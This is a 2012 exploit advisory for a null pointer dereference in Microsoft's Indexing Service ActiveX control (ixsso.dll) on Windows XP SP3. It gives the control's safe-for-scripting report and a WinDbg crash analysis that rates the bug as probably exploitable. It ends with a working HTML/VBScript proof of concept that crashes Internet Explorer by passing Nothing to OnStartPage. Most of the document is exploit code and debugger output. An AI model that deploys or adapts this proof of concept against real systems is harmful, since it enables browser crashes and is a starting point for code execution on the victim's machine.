Exploit Title: Microsoft Indexing Service Server-side (ixsso.dll) null
pointer dereference
Crash : http://img836.imageshack.us/img836/7742/microsoftf.png
Date: 2012-08-24
Author: coolkaveh
coolkaveh () rocketmail com
Https://twitter.com/coolkaveh
Vendor Homepage: http://http://www.microsoft.com/
Version: 5.1.2600.5512
Tested on: windows XP Sp3 ENG
Greets To Mohammad Morteza Sanaie
sanaie.morteza () gmail com
-----------------------------------------------------------------------------------------
Class CissoQuery
GUID: {A4463024-2B6F-11D0-BFBC-0020F8008024}
Number of Interfaces: 1
Default Interface: IixssoQuery
RegKey Safe for Script: True
RegkeySafe for Init: True
-----------------------------------------------------------------------------------------
Report for Clsid: {A4463024-2B6F-11D0-BFBC-0020F8008024}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller
-----------------------------------------------------------------------------------------
(c8c.85c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=02e126d0 ecx=774fef18 edx=0020e5ea esi=0020e5c4 edi=00000000
eip=65da3d35 esp=02a4f070 ebp=02a4f098 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for C:\WINDOWS\system32\ixsso.dll -
ixsso!DllCanUnloadNow+0xeac:
65da3d35 8b08 mov ecx,dword ptr [eax] ds:0023:00000000=????????
Missing image name, possible paged-out or corrupt data.
0:012> !load winext\msec.dll
0:012> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for C:\WINDOWS\system32\OLEAUT32.dll -
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for C:\WINDOWS\system32\mshtml.dll -
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for C:\WINDOWS\system32\vbscript.dll -
Exception Faulting Address: 0x0
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation
Faulting Instruction:65da3d35 mov ecx,dword ptr [eax]
Basic Block:
65da3d35 mov ecx,dword ptr [eax]
Tainted Input Operands: eax
65da3d37 lea edx,[ebp+8]
65da3d3a push edx
65da3d3b push offset ixsso+0x1400 (65da1400)
65da3d40 push eax
Tainted Input Operands: eax
65da3d41 mov dword ptr [ebp+8],edi
65da3d44 mov dword ptr [ebp-0ch],edi
65da3d47 mov dword ptr [ebp-8],edi
65da3d4a mov dword ptr [ebp-4],edi
65da3d4d call dword ptr [ecx]
Tainted Input Operands: ecx, StackContents
Exception Hash (Major/Minor): 0x3716130a.0x43133e77
Stack Trace:
ixsso!DllCanUnloadNow+0xeac
OLEAUT32!DispCallFunc+0xc3
OLEAUT32!DispCallFunc+0x6d2
OLEAUT32!DispInvoke+0x23
ixsso!DllCanUnloadNow+0x391
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc86d3
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc8ce9
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc8736
vbscript!DllGetClassObject+0x12b6d
vbscript!DllGetClassObject+0x12ae0
vbscript!DllGetClassObject+0x12a81
vbscript+0x3da8
vbscript+0x40bf
vbscript+0x6412
vbscript+0x6397
vbscript+0x6bed
vbscript+0x6de5
vbscript!DllCanUnloadNow+0x15b6
vbscript+0xa306
mshtml+0xa195b
mshtml+0xa1804
mshtml+0xa18f0
mshtml+0xa06f5
Instruction Address: 0x0000000065da3d35
Description: Data from Faulting Address controls Code Flow
Short Description: TaintedDataControlsCodeFlow
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable - Data from Faulting
Address controls Code Flow starting at
ixsso!DllCanUnloadNow+0x0000000000000eac (Hash=0x3716130a.0x43133e77)
The data from the faulting address is later used as the target for a branch.
--------------------------------------------------------------------------------------------------------------------------------------------------------
<html>
Exploit
<object classid='clsid:A4463024-2B6F-11D0-BFBC-0020F8008024'
id='target' /></object>
<script language='vbscript'>
targetFile = "C:\WINDOWS\system32\ixsso.dll"
prototype = "Property Let OnStartPage As object"
memberName = "OnStartPage"
progid = "Cisso.CissoQuery"
argCount = 1
Set arg1=Nothing
target.OnStartPage arg1
</script>